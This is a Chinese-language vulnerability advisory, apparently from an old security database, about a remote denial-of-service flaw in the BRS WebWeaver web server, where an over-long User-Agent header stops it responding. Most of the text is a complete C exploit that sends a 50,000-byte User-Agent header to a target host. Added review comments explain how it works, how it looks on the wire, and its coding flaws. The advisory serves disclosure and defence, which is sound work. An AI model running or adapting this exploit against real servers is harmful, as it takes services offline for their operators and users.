
BRS WebWeaver httpd `User-Agent`远程拒绝服务漏洞


发布时间:2003-11-04
更新时间:2003-11-04
严重程度:
威胁程度:远程拒绝服务
错误类型:边界检查错误
利用方式:服务器模式

BUGTRAQ ID:8947

受影响系统
BRS WebWeaver 62 beta
BRS WebWeaver 0.49 beta
BRS WebWeaver 0.50 beta
BRS WebWeaver 0.51 beta
BRS WebWeaver 0.52 beta
BRS WebWeaver 0.60 beta
BRS WebWeaver 0.61 beta
BRS WebWeaver 0.62 beta
BRS WebWeaver 0.63 beta
BRS WebWeaver 1.0 6
BRS WebWeaver 1.0 5
BRS WebWeaver 1.0 4
BRS WebWeaver 1.0 3
BRS WebWeaver 1.0 2
BRS WebWeaver 1.0 1
详细描述
BRS WebWeaver是支持CGI,ISAPI,SSI和基于IP地址安全的WEB服务程序。

当BRS WebWeaver接收到包含超长字符串的`User-Agent`字段时,可导致服务程序停止响应。

测试代码
/*
*  BRS WebWeaver v.1.06 remote DoS exploit
*
* -d4rkgr3y [d4rk securitylab ru]
*
*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>

/* Destination TCP port; passed through htons() into sin_port below. */
#define port 80

/*
 * Proof-of-concept for the condition described in the advisory: an HTTP
 * request whose User-Agent value is over-long.
 *
 * Builds one HTTP/1.0 GET request in a stack buffer, fills the User-Agent
 * value with c (50000) bytes of 0x41, appends "Connection: Keep-Alive" and a
 * blank line, connects to argv[1] on `port`, writes the request once and
 * closes the socket. The response is never read, so the program itself does
 * not confirm whether the server stopped responding.
 *
 * What this looks like on the wire (for log/IDS review): a single request
 * with one User-Agent header line of about 50 KB of a repeated byte, and
 * header lines terminated by a bare LF (0x0a) rather than CRLF.
 * NOTE(review): the page names no fixed version; a request-header size limit
 * in front of the server is the generic control - confirm against the vendor.
 *
 * argv[1]: dotted-quad address or host name of the server under test.
 * Exit status: 1 on usage error or failed name resolution; 0 on socket or
 * connect failure (see notes below); falls off the end of main otherwise.
 *
 * NOTE(review): exit, bzero, inet_addr, write and close are called without
 * their usual headers among the visible includes, and main has no declared
 * return type, so this builds only with compilers that still accept
 * implicit int / implicit declarations.
 */
main(int argc, char **argv) {
    struct hostent *hs;
    struct sockaddr_in sock;
    int sockfd, i;  /* i is never used in this function */
    const c = 50000;  /* implicit int: number of filler bytes in the User-Agent value */
    /*
     * The initializer supplies the fixed request head up to "User-Agent: ";
     * the rest of the 50150-byte array is zero-filled by the initializer,
     * which the strlen()-based appends below depend on.
     */
    char request[50150] =
        "GET /m00-r0cz HTTP/1.0\n"
        "Accept: */*\n"
        "Accept-Language: jp\n"
        "Accept-Encoding: gzip, deflate\n"
        "Host: m00security.org\n"
        "User-Agent: ";
    printf("BRS WebWeaver v.1.06 remote DoS exploit\n\n");

    /* Exactly one argument (the target host) is required. */
    if (argc!=2){
        printf("usage\n %s hostname\n\n",argv[0]);
        exit(1);
    }

    //memset((request+98),0x41,c);
    /* Write c bytes of 0x41 ('A') starting at the current end of the string,
     * i.e. as the User-Agent value. The bytes after them are still zero, so
     * the buffer stays NUL-terminated. */
    memset((request+strlen(request)),0x41,c);
    /* l33t ;] */
    /*
     * Each store below overwrites the current terminator with one byte; the
     * next zero byte of the array then acts as the new terminator. The bytes
     * spell "\nConnection: Keep-Alive\n\n": end of the User-Agent line, one
     * more header, and the blank line that ends the request head. The order
     * of these statements is the order of the bytes in the request.
     */
    request[strlen(request)] = 0x0a;
    request[strlen(request)] = 0x43;
    request[strlen(request)] = 0x6f;
    request[strlen(request)] = 0x6e;
    request[strlen(request)] = 0x6e;
    request[strlen(request)] = 0x65;
    request[strlen(request)] = 0x63;
    request[strlen(request)] = 0x74;
    request[strlen(request)] = 0x69;
    request[strlen(request)] = 0x6f;
    request[strlen(request)] = 0x6e;
    request[strlen(request)] = 0x3a;
    request[strlen(request)] = 0x20;
    request[strlen(request)] = 0x4b;
    request[strlen(request)] = 0x65;
    request[strlen(request)] = 0x65;
    request[strlen(request)] = 0x70;
    request[strlen(request)] = 0x2d;
    request[strlen(request)] = 0x41;
    request[strlen(request)] = 0x6c;
    request[strlen(request)] = 0x69;
    request[strlen(request)] = 0x76;
    request[strlen(request)] = 0x65;
    request[strlen(request)] = 0x0a;
    request[strlen(request)] = 0x0a;

    /* Zero the address structure, then fill in family and port. */
    bzero(&sock, sizeof(sock));
    sock.sin_family = AF_INET;
    sock.sin_port = htons(port);
    /* Try argv[1] as a dotted-quad first; -1 is treated as "not an address"
     * and triggers a name lookup instead.
     * NOTE(review): 255.255.255.255 also yields -1 from inet_addr. */
    if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
        if ((hs=gethostbyname(argv[1]))==NULL) {
            printf("damn");
            exit(1);
        }
        printf("~ Host resolved.\n");
        /* NOTE(review): sin_family is replaced by h_addrtype although the
         * socket below is always AF_INET, and h_length bytes are copied into
         * s_addr without comparing h_length to sizeof(s_addr). */
        sock.sin_family = hs->h_addrtype;
        memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
    }
    /* NOTE(review): both failure paths below exit with status 0, unlike the
     * usage and resolution failures above, which exit with 1. */
    if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
        perror("damn");  exit(0);
    }

    if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
        perror("damn"); exit(0);
    }
    printf("~ Socket connected\n");
    printf("~ Sending evil code... ");
    /* Single write of the whole request; the return value is ignored, so a
     * short or failed write is not detected and "done" is printed anyway. */
    write(sockfd,request,strlen(request));
    printf("done\n\n");
    close(sockfd);
}
/* m00 */

相关信息
d4rkgr3y <d4rk@securitylab.ru>.
参考:http://www.securityfocus.com/archive/1/343111